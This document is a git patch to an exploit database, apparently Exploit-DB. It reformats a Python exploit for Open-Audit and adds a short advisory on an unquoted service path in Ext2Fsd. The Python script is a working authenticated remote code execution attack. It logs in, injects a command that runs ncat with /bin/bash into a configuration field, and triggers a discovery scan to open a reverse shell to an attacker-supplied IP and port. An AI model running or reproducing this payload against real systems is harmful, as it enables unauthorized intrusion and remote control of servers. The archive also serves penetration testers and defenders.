From 2f2c713a1291cbf6d84e79cc694d9dc6db4153d2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Mar 2021 05:02:09 +0000 Subject: [PATCH] DB: 2021-03-25 2 changes to exploits/shellcodes Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path --- exploits/php/webapps/48393.py | 58 ++++++++++++++------------------ exploits/windows/local/49706.txt | 29 ++++++++++++++++ files_exploits.csv | 1 + 3 files changed, 56 insertions(+), 32 deletions(-) create mode 100644 exploits/windows/local/49706.txt diff --git a/exploits/php/webapps/48393.py b/exploits/php/webapps/48393.py index de41b5a2b..b339ee5a9 100755 --- a/exploits/php/webapps/48393.py +++ b/exploits/php/webapps/48393.py @@ -16,44 +16,40 @@ import string from bs4 import BeautifulSoup from urllib.parse import quote -warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') -if len(sys.argv) !=3D 6: - print("[~] Usage : ./openaudit-exploit.py url username password ip port= -") +if len(sys.argv) != 6: + print("[~] Usage : ./openaudit-exploit.py url username password ip port") exit() -url =3D sys.argv[1] -username =3D sys.argv[2] -password =3D sys.argv[3] -ip =3D sys.argv[4] -port =3D sys.argv[5] +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] -request =3D requests.session() +request = requests.session() def inject_payload(): - configuration_path =3D url+"/en/omk/open-audit/configuration/90" - data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"= -:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, = -port) + configuration_path = url+"/en/omk/open-audit/configuration/90" + data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port) request.patch(configuration_path, data) print("[+] Payload injected in settings") def start_discovery(): - discovery_path =3D url+"/en/omk/open-audit/discoveries/create" - post_discovery_path =3D url+"/en/omk/open-audit/discoveries" - scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r= -ange(10)]) - req =3D request.get(discovery_path) + discovery_path = url+"/en/omk/open-audit/discoveries/create" + post_discovery_path = url+"/en/omk/open-audit/discoveries" + scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)]) + req = request.get(discovery_path) - response =3D req.text - soup =3D BeautifulSoup(response, "html5lib") - token =3D soup.findAll('input')[5].get("value") - buttons =3D soup.findAll("button") - headers =3D {"Referer" : discovery_path} - request_data =3D { + response = req.text + soup = BeautifulSoup(response, "html5lib") + token = soup.findAll('input')[5].get("value") + buttons = soup.findAll("button") + headers = {"Referer" : discovery_path} + request_data = { "data[attributes][name]":scan_name, "data[attributes][other][subnet]":"10.10.10.1/24", "data[attributes][other][ad_server]":"", @@ -101,23 +97,21 @@ ange(10)]) } print("[+] Creating discovery ..") - req =3D request.post(post_discovery_path, data=3Drequest_data, headers= -=3Dheaders, allow_redirects=3DFalse) - disocvery_url =3D url + req.headers['Location'] + "/execute" + req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False) + disocvery_url = url + req.headers['Location'] + "/execute" print("[+] Triggering payload ..") print("[+] Check your nc ;)") request.get(disocvery_url) def login(): - login_info =3D { + login_info = { "redirect_url": "/en/omk/open-audit", "username": username, "password": password } - login_request =3D request.post(url+"/en/omk/open-audit/login", login_in= -fo) - login_text =3D login_request.text + login_request = request.post(url+"/en/omk/open-audit/login", login_info) + login_text = login_request.text if "There was an error authenticating" in login_text: return False else: diff --git a/exploits/windows/local/49706.txt b/exploits/windows/local/49706.txt new file mode 100644 index 000000000..af96bc3e4 --- /dev/null +++ b/exploits/windows/local/49706.txt @@ -0,0 +1,29 @@ +# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path +# Date: 2021-1-19 +# Exploit Author: Mohammed Alshehri +# Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download +# Version: 0.68 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc Ext2Srv +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Ext2Srv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Ext2 Management Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b4a436b97..439bfc307 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11308,6 +11308,7 @@ id,file,description,date,author,type,platform,port 49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows, 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows, 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows, +49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139